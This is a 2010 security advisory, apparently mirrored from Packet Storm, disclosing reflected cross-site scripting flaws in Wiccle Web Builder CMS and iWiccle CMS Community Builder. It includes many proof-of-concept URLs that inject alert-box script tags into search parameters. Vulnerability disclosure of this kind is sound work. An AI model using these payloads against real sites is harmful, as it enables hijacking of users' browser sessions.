Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormVeerendra G.GPACKETSTORM:95079
HistoryOct 22, 2010 - 12:00 a.m.

Wiccle Web Builder CMS / iWiccle CMS Community Builder Cross Site Scripting

2010-10-2200:00:00
Veerendra G.G
packetstormsecurity.com
22
JSON
`##############################################################################  
Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site  
Scripting Vulnerability.  
  
SecPod Technologies (www.secpod.com)  
Author Veerendra G.G  
###############################################################################  
  
SecPod ID: 1005 09/07/2010 Issue Discovered  
09/10/2010 Vendor Notified  
09/13/2010 Vendor Confirmed  
09/14/2010 Fix Available  
  
  
Class: Cross-Site Scripting Severity: Medium  
  
  
Overview:  
---------  
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple  
Cross-Site Scripting Vulnerabilities.  
  
  
Technical Description:  
----------------------  
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple  
Cross-Site vulnerabilities because it fails to properly sanitize user-supplied input.  
  
NOTE: Vulnerability is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)  
  
1) Input passed via the 'member_city' parameter to 'index.php' when 'module' is  
set to 'dating' and 'show' is set to 'member_search' is not properly verified  
before it is returned to the user.  
  
NOTE: This vulnerability exists only in Wiccle Web Builder CMS  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1  
  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30  
  
  
2) Input passed via the 'post_name', 'post_text', 'post_tag', 'post_member_name'  
parameter to 'index.php' when 'module' is set to various (Auctions, Audio etc.,)  
options and 'show' is set to 'post_search' is not properly verified before  
it is returned to the user.  
  
NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS  
and iWiccle CMS Community Builder).  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
  
3) Input passed via the 'member_username', 'member_tags' parameter to 'index.php'  
when 'module' is set to 'members' and 'show' is set to 'member_search' is not  
properly verified before it is returned to the user.  
  
NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS  
and iWiccle CMS Community Builder).  
  
POC:  
* http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
  
These can be exploited to execute arbitrary HTML and script code in a user's  
browser session in the context of a vulnerable site. This may allow an attacker  
to steal cookie-based authentication and launch further attacks.  
  
The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip) and  
iWiccle CMS Community Builder (iwiccle_1211.zip)  
  
  
Impact:  
--------  
Successful exploitation could allow an attacker to execute arbitrary HTML and  
script code in a user's browser session in the context of a vulnerable site.  
  
  
Affected Software:  
------------------  
Wiccle Web Builder CMS 2.0 (wwb_101.zip)  
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)  
  
  
References:  
-----------  
http://www.wiccle.com/  
http://secpod.org/blog/?p=130  
http://wiccle.com/download/wwb_101.zip  
http://wiccle.com/download/iwiccle_1211.zip  
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt  
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas  
  
  
Proof of Concepts:  
-----------------  
NOTE: It is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)  
  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1  
  
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30  
  
* http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
* http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>  
  
  
Other POC's:  
-------------  
http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>  
http://<Target_IP>/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>  
  
  
Workaround:  
-----------  
Not available  
  
  
Solution:  
---------  
iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)  
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas  
  
  
Risk Factor:  
-------------  
CVSS Score Report  
ACCESS_VECTOR = NETWORK  
ACCESS_COMPLEXITY = MEDIUM  
AUTHENTICATION = NONE  
CONFIDENTIALITY_IMPACT = NONE  
INTEGRITY_IMPACT = PARTIAL  
AVAILABILITY_IMPACT = NONE  
EXPLOITABILITY = PROOF_OF_CONCEPT  
REMEDIATION_LEVEL = UNAVAILABLE  
REPORT_CONFIDENCE = CONFIRMED  
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
  
Credits:  
--------  
Veerendra G.G of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
`
JSON